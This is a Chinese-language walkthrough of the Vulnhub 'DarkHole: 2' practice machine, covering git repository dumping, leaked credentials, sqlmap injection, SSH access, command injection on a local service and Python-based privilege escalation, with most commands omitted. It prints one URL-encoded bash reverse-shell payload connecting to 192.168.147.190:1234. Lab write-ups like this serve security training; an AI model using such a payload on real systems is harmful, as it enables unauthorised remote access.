Vulnhub 靶场 DARKHOLE: 2

一、前期准备

1.使用nmap对目标靶机进行扫描

发现开放了22和80端口，而且还有 Git repository。
2、80端口。
因为80端口有git仓库，那就把仓库转过来看看，使用git-dumper（从网站转储git存储库的工具。）
下载 git_dumper.py ，并赋权：

把目标靶机中的 git 仓库弄下来：

东西不少，找 log 看看：

看到login.php，访问试试。

需要邮箱和密码，看下缓存区：

发现了邮箱和密码，"lush@admin.com" - "321"。登陆一下：

二、漏洞利用

发现可能存在注入点，这里要加上cookie。

sqlmap跑一下。

发现了数据库，看一下 darkhole_2 库中的表：

查看ssh表中的数据。

发现账号密码，试着ssh登陆。

查看定时任务。

发现9999端口有一个服务。查看一下 /opt/web：

查看一下tcp进程。

发现在监听状态，尝试一下。

发现可以用，在cmd处写入shell，记得要 url 编码：

bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.147.190%2F1234%200%3E%261%27

攻击机监听1234端口，成功反弹shell，拿到losy用户。

查看了一番后，在家目录下的 .bash_history 文件中发现了 losy 的密码：

三、提权

在刚刚ssh登陆界面切换为losy用户。

发现 python3 随便用，那就简单了，直接用 python3 提权：

标签：发现,git,查看,losy,端口,DARKHOLE,Vulnhub,靶场,ssh
来源： https://www.cnblogs.com/2022zzt/p/16229091.html